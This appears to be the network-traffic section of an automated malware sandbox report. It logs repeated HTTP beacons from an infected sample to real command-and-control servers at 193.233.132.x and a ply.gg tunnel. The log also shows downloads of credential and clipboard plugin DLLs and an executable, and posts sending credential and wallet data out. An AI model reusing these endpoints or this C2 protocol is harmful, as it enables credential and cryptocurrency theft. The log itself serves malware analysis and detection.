Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: GET /enigma/Plugins/cred64.dll HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: GET /lend/build12.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 31 38 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000187001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: GET /lend/build12.exe HTTP/1.1Host: 193.233.132.167If-Modified-Since: Fri, 19 Apr 2024 00:20:52 GMTIf-None-Match: "6621b8e4-17e00"
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /enigma/Plugins/clip64.dll HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-AliveData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnect xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 31 38 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000188001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-AliveData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnect xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php?wal=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----NDYyMQ==Host: 193.233.132.167Content-Length: 4781Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
